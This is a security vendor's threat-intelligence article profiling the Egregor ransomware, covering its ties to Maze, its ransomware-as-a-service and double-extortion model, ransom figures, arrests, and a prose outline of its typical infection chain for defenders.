By Bhabesh Raj Rai, Associate Security Analytics Engineer at LogPoint
Bhabesh Raj Rai, Associate Security Analytics Engineer at LogPoint
Egregor is a variant of the Sekhmet ransomware family, is among the most active and aggressive ransomware strains of the past year, and is widely considered the successor to the Maze ransomware. Several security researchers have independently concluded that Egregor will be linked to malware such as Qakbot, IcedID, and Ursnif to gain initial access to the victims ‘ systems.
Egregor first appeared in mid-September 2020, while the makers of the Maze ransomware publicly announced their withdrawal at the same time. In this short time, Egregor has succeeded in several infections. Among others at well-known companies such as Kmart, Ubisoft, Crytek, and Randstad. The increase in the activity of Egregor signals that Maze’s partners have switched to Egregor quickly and smoothly.
Egregor follows the same ransomware-as-a-Service (RAAS) model as other popular ransomware strains, such as Ryuk and Maze. At RaaS, the cybercriminals subscribe to the use of Egregor, so that even beginners can launch complex ransomware attacks. Another reason for the rapid spread of Egregor is the highly effective tactic of double blackmail, in which cybercriminals access sensitive data, encrypt it to prevent access by victims, and then publish part of the affected data as evidence of exfiltration.
Double blackmail puts the greatest possible pressure on victims to pay the ransom, and it works. Arete IR determined that Egregor’s average ransom demand is $ 3,407,119, with an average downtime of 12 days. The cybercriminal users of Egregor are known for their negotiating style. They give their victims an ultimatum: data will be released after 72 hours if they do not receive a response after encrypting the victims ‘ systems. Like Maze and Ryuk, Egregor also has big companies in its sights, as they can pay a high ransom, which means significant profits.
A typical Egregor attack involves a malicious Microsoft Office document attached to a phishing email as the first infection vector. Upon opening the document, this can download malicious macro malware such as Qakbot or IcedID. The downloaded malware then starts scouting the host and network, collecting credentials that can be used for lateral movements. The malware can use either PsExec or WMI for lateral movements. In certain cases, Egregor actors have also used Cobalt Strike. At the end of the infection cycle, the malware usually downloads a batch and zip file. The zip file contains the RClone tool with its configuration files for exfiltration of data to cloud file-hosting sites such as DropBox or OneDrive. The batch contains a command to download and run the Egregor DLL via rundll32.
In February 2021, joint investigations by the French and Ukrainian police led to the arrest of some customers of RaaS Egregor. However, the authorities assume that none of these arrested criminals belong to the operational team of Egregor. It can be assumed that the arrests will not lead to a permanent shutdown of the Egregor ransomware family.
Using the MITRE ATT & amp; CK framework and LogPoint, the “Blue Teams” can track Egregor at all stages of an attack. The threat hunters can use the queries listed below to search Egregor’s various tactics, techniques, and procedures (TTPs).